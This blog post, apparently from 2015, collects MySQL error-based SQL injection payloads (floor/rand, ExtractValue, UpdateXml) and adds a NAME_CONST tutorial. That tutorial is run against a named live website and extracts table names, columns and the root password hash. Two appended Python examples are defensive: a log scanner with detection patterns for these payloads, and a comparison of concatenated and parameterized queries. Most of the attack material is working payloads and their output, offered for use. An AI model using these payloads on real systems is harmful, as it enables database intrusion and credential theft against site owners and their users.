
MySQL: exploitation methods for the three error-based injection modes floor, ExtractValue and UpdateXml

Posted 2015-11-11 19:03:37

1. Error via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace the version() expression with the subquery you need.
For example, to retrieve the administrator's username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
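All three modes above share one property a defender can key on: the extracted value travels inside a MySQL error message (a "Duplicate entry ... for key 'group_key'" error for the floor/rand trick, an "XPATH syntax error" for ExtractValue and UpdateXml, and a "Duplicate column name" error for the NAME_CONST variant collected further down in this post). The Python script below is an added example and is not part of the original post: it scans constructed application log lines that record each SQL statement together with the MySQL error text, flags lines carrying the payload markers or the error signatures, and recovers the leaked value from the message. The log format and the sample lines are assumptions made for this example.

```python
import re
from typing import Optional

# Constructed sample log (not from the post): one line per statement, recording the SQL text
# and, when the statement failed, the MySQL error text. The injected statements and errors
# mirror the mysql> sessions above; the last line is a legitimate duplicate-key failure.
SAMPLE_LOG = r"""
2015-11-11 19:03:37 app[1234]: sql="select * from article where id = 1" ok rows=1
2015-11-11 19:03:41 app[1234]: sql="select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)" error="ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"
2015-11-11 19:03:45 app[1234]: sql="select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))" error="ERROR 1105 (HY000): XPATH syntax error: '\admin888'"
2015-11-11 19:03:49 app[1234]: sql="select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1))" error="ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'"
2015-11-11 19:03:53 app[1234]: sql="select * from article where id = 1 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)" error="ERROR 1060 (42S21): Duplicate column name '5.0.27-community-nt'"
2015-11-11 19:03:57 app[1234]: sql="insert into article (id, title) values (1, 'test')" error="ERROR 1062 (23000): Duplicate entry '1' for key 'PRIMARY'"
"""

# Assumed log layout: sql="..." followed by either ok ... or error="...".
LINE_RE = re.compile(r'sql="(?P<sql>[^"]*)"(?: ok| error="(?P<err>[^"]*)")')

# Markers of the four error-based techniques inside the statement text.
PAYLOAD_MARKERS = {
    "floor":        re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "extractvalue": re.compile(r"extractvalue\s*\(", re.I),
    "updatexml":    re.compile(r"updatexml\s*\(", re.I),
    "name_const":   re.compile(r"name_const\s*\(", re.I),
}

# Error signatures that carry the extracted value. A real duplicate-key error names a real
# index ('PRIMARY', 'title', ...); 'group_key' is the temporary table key of the GROUP BY trick.
ERROR_SIGNATURES = {
    "floor":      re.compile(r"Duplicate entry '(?P<leak>.*)' for key 'group_key'"),
    "xpath":      re.compile(r"XPATH syntax error: '(?P<leak>.*)'"),
    "name_const": re.compile(r"Duplicate column name '(?P<leak>.*)'"),
}


def classify(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None when nothing suspicious is seen."""
    m = LINE_RE.search(line)
    if not m:
        return None
    sql, err = m.group("sql"), m.group("err") or ""
    markers = [name for name, rx in PAYLOAD_MARKERS.items() if rx.search(sql)]
    error_kind, leaked = None, None
    for name, rx in ERROR_SIGNATURES.items():
        em = rx.search(err)
        if em:
            error_kind, leaked = name, em.group("leak")
            break
    if not markers and error_kind is None:
        return None
    if error_kind == "floor":
        leaked = leaked[:-1]            # drop the 0/1 that floor(rand(0)*2) appended to the value
    elif error_kind == "xpath":
        leaked = leaked.lstrip("\\:~")  # drop the separator added with concat(0x5c, ...) / concat(0x3a, ...)
    return {"markers": markers, "error_kind": error_kind, "leaked": leaked, "sql": sql}


def scan(log_text: str) -> list:
    """Run classify() over every line and collect the findings in log order."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["markers"], finding["error_kind"], "leaked:", finding["leaked"])
```

Both sides of the signature matter: an XPATH or group_key error without a marker in the statement still deserves an alert (the marker may be obfuscated), and a marker without an error indicates the probe that precedes the successful extraction.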

More collected material:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: injection using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|               |
|---------------|
|       1       |
|               |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables:

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error....

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
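Every variant in this post, from floor() to NAME_CONST, needs two things from the application: the id parameter has to be pasted into the SQL text, and the database error has to be echoed back to the client. The script below is an added example (not code from the post or from any of the sites it mentions) that puts the vulnerable pattern next to its hardened form. It uses the sqlite3 module that ships with Python as a stand-in for MySQL so that it runs offline, with a `?` placeholder where a MySQL driver such as mysql-connector uses `%s`; the article table and the payload string come from the first section of the post, and the function names are this example's own.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in database: the article table from the post's mysql> session."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article (id integer, title text, content text)")
    conn.execute("insert into article values (1, 'test', 'do it')")
    return conn


# The ExtractValue payload from the post, exactly as it would arrive in the id parameter.
PAYLOAD = "1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))"


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> dict:
    """Vulnerable pattern: the parameter is concatenated into the statement, so everything after
    the number is parsed as SQL, and the raw database error is returned to the caller, which is
    exactly the channel the error-based techniques read the extracted value from."""
    sql = "select * from article where id = " + raw_id
    try:
        return {"rows": conn.execute(sql).fetchall()}
    except sqlite3.Error as e:
        return {"error": str(e)}  # reflected error text: the leak channel


def lookup_safe(conn: sqlite3.Connection, raw_id: str) -> dict:
    """Hardened form: the value is bound as a parameter, so the whole string is compared with the
    id column as data and never parsed as SQL. Database errors belong in the server log; the
    client only ever sees a fixed message, so no error-based variant has anything to read."""
    try:
        rows = conn.execute("select * from article where id = ?", (raw_id,)).fetchall()
        return {"rows": rows}
    except sqlite3.Error:
        return {"error": "internal error"}


if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_vulnerable, lookup_safe):
        print(fn.__name__, "id=1       ->", fn(db, "1"))
        print(fn.__name__, "id=PAYLOAD ->", fn(db, PAYLOAD))
```

With the bound parameter the payload is compared against the id column as one text value, matches no row, and the statement succeeds without ever reaching a function call; the concatenated version hands the same string to the SQL parser and surfaces the resulting database error to the caller.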
